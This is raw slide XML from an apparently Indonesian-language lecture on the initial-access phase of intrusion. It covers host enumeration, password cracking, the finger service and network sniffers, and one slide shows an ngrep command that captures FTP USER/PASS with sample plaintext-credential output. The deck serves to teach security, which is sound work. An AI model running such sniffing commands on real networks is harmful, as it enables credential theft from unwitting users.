            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2928" y="1392"/>
              <a:ext cx="768"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Win NT SP 6</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="1400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26641" name="Rectangle 53"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2381" y="1392"/>
              <a:ext cx="547"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ya</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="1400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26642" name="Rectangle 54"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1382" y="1392"/>
              <a:ext cx="999"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10.10…</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="1400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26643" name="Rectangle 55"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="384" y="1392"/>
              <a:ext cx="998" cy="325"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:no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www.bank.com</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="1400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26644" name="Rectangle 56"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3696" y="1056"/>
              <a:ext cx="1680" cy="336"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solid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Services</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="1400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26645" name="Rectangle 57"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2928" y="1056"/>
              <a:ext cx="768" cy="336"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solid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OS</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="1400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26646" name="Rectangle 58"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2381" y="1056"/>
              <a:ext cx="547" cy="336"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solid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Alive</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="1400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26647" name="Rectangle 59"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1382" y="1056"/>
              <a:ext cx="999" cy="336"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solid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No IP</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="1400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26648" name="Rectangle 60"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="384" y="1056"/>
              <a:ext cx="998" cy="336"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="12700" cap="sq">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="bg2"/>
                </a:buClr>
                <a:buSzPct val="75000"/>
                <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400"/>
                <a:t>Nama</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="1400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26649" name="Line 61"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="384" y="1056"/>
              <a:ext cx="4992" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575" cap="sq">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26650" name="Line 62"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="384" y="1392"/>
              <a:ext cx="4992" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26651" name="Line 63"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="384" y="1717"/>
              <a:ext cx="4992" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26652" name="Line 64"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="384" y="2042"/>
              <a:ext cx="4992" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26653" name="Line 65"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="384" y="2330"/>
              <a:ext cx="4992" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575" cap="sq">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26654" name="Line 66"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="384" y="1056"/>
              <a:ext cx="0" cy="1274"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575" cap="sq">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26655" name="Line 67"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1382" y="1056"/>
              <a:ext cx="0" cy="1274"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26656" name="Line 68"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2381" y="1056"/>
              <a:ext cx="0" cy="1274"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26657" name="Line 69"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2928" y="1056"/>
              <a:ext cx="0" cy="1274"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26658" name="Line 70"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3696" y="1056"/>
              <a:ext cx="0" cy="1274"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26659" name="Line 71"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5376" y="1056"/>
              <a:ext cx="0" cy="1274"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575" cap="sq">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>
            <a:lstStyle/>
            <a:p>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Initial Access </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27651" name="Rectangle 5"/>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Tujuan &amp; Cara</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28675" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Tujuan: masuk ke sistem komputer / jaringan meskipun dengan access yang rendah (guest)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Cara: mencoba berbagai cara (termasuk yang ilegal) seperti</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Menyadap userid &amp; password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Password cracking</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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Mencari tahu tentang user</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29699" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Mencari nama user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Program / servis “finger”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>finger @nama.server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Melihat daftar email (dari mailing list, web)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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Mencoba masuk</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1028" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1219200"/>
            <a:ext cx="7772400" cy="4760913"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Menyadap dengan sniffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Userid dan password beberapa aplikasi (telnet, ftp, POP, dll.) dikirimkan dalam bentuk clear text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Windows: Sniffer Pro, winsniffer, dsniff, ethereal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>UNIX: ngrep, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>dsniff, ethereal</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1029" name="Picture 4" descr="screensmall"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="5029200"/>
            <a:ext cx="3429000" cy="1828800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1026" name="Object 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4267200" y="3687762"/>
          <a:ext cx="4713287" cy="3170238"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <p:oleObj spid="_x0000_s1026" name="Document" r:id="rId4" imgW="4712400" imgH="3170520" progId="Word.Document.8">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Menyadap dengan “ngrep”</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30723" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>indocisc# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ngrep </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>–q </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>‘USER|PASS’ tcp port 21</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>interface: eth0 (192.168.1.0/255.255.255.0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>filter: ip and ( tcp port 21 )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>match: USER|PASS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#######</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>T 192.168.1.7:1842 -&gt; 192.168.1.12:21 [AP]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>USER budi..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#####</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>T 192.168.1.7:1842 -&gt; 192.168.1.12:21 [AP]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PASS ketahuan..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Menyadap dengan “dsniff”</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31747" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dsniff</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
